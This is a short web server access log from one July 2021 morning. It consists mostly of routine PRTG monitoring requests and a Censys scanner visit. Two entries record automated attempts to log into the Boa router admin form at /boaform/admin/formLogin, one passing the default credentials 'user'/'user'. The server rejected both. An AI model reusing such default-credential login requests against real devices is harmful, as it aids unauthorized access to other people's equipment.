212.91.246.72 - - [01/Jul/2021:08:16:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.231.132.248 - - [01/Jul/2021:08:16:05 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
212.91.246.72 - - [01/Jul/2021:08:17:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:18:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:19:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:20:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:21:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:22:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:23:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:24:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:25:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:26:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:27:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.248.133.39 - - [01/Jul/2021:08:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.39 - - [01/Jul/2021:08:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jul/2021:08:28:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
199.19.224.201 - - [01/Jul/2021:08:28:38 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Jul/2021:08:29:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:30:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:31:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2021:08:32:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.62.123.46 - - [01/Jul/2021:08:32:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Jul/2021:08:33:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
